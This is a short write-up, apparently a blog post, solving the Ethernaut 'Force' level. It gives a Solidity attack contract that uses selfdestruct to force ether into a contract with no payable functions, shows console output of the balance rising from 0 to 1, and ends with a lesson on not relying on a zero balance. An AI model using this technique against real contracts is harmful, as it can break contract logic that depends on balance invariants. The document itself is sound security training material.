🌴
Ethernaut-solution 7. Force
Ethernaut-solution
7. Force
Some contracts will simply not take your money ¯_(ツ)_/¯
The goal of this level is to make the balance of the contract greater than zero.
Things that might help:
-
Fallback methods
-
Sometimes the best way to attack a contract is with another contract.
-
See the Help page above, section "Beyond the console"
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Force {/*
MEOW ?
/\_/\ /
____/ o o \
/~____ =ø= /
(______)__m_m)
*/}
//make AttackFile
/ForceAttack.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract ForceAttack {
constructor() public payable {
}
function attack(address payable _constractAddr) public {//errorが出たのでpayableはoriginal
selfdestruct(_constractAddr);
}
}
await getBalance(contract.address)
'0'
contract.address
'0x58dc2d03B86410ed60cCdD453E568f3198EBAc7a'
//ether送金完了
await getBalance(contract.address)
'1'
In solidity, for a contract to be able to receive ether, the fallback function must be marked payable.
However, there is no way to stop an attacker from sending ether to a contract by self destroying.
Hence, it is important not to count on the invariant address(this).balance == 0 for any contract logic.
Discussion